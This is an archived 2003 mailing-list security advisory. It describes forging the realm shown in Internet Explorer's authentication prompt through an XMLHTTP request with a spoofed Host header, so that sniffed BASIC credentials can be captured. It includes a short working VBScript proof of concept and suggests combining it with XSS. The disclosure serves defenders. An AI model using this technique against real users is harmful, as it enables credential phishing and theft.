================================================= Domain Name Forging On Authentication Prompt ------------------------------------------------- Tested under * Win2k Server, fully patched, with IE 6.0 * Winxp, fully patched, with IE 6.0 ================================================= * Background * When browsing to a folder/file that is protected by BASIC or NTLM authentication a window is displayed to the user, prompting for user credentials. +------------------------------------------+ | Please type your user name and password | | Site: [IP/Host] | | Realm: [Domain ] | | Username: [ ] | | Password: [ ] | | [OK] [CANCEL] | +------------------------------------------+ * Details * It is possible to use the Msxml2.XMLHTTP object to create a login box and set the realm to an arbitrary value. Using the object to make a request to a URI that requires authentication and setting the HOST header to a domain of our choosing, the login prompt will be displayed using the HOST header value as the realm. Aulthough the SITE displayed will be the IP of the URI (xxx.xxx.x.xx), unwary users may trust the realm value and enter their login credentials. By running a sniffer on the machine hosting the protected folder, it is possible to sniff the BASIC authorization string, which in turn can be base64 decoded to reveal the plaintext username:password pair. This could be made more effective by using XSS to have the script appear to be running from a valid domain. The sample script below should be enough to demonstrate. Note: To bypass IE domain restrictions the ip of the protected folder needs to be the same as the site hosting the script. [Code Sample] <*script language="vbscript"> function sendinfo() Dim myhttp Set myhttp=CreateObject("Msxml2.XMLHTTP") myhttp.open "GET", "http://xxx.xxx.x.xx/_vti_bin/_vti_adm/admin.dll", false myhttp.setRequestHeader "Host", "secure.foo.bar" myhttp.send set myhttp = Nothing end function </*script> <*script>sendinfo()</*script> [End Code Sample] * Solution * This issue is probably by design and as such the problem is with the end user verifying the site that they are entering credentials for. Brett Moore Network Intrusion Specialist security-assessment.com +64-9-300-6494
This archive was generated by hypermail 2b30 : Fri May 09 2003 - 09:27:12 PDT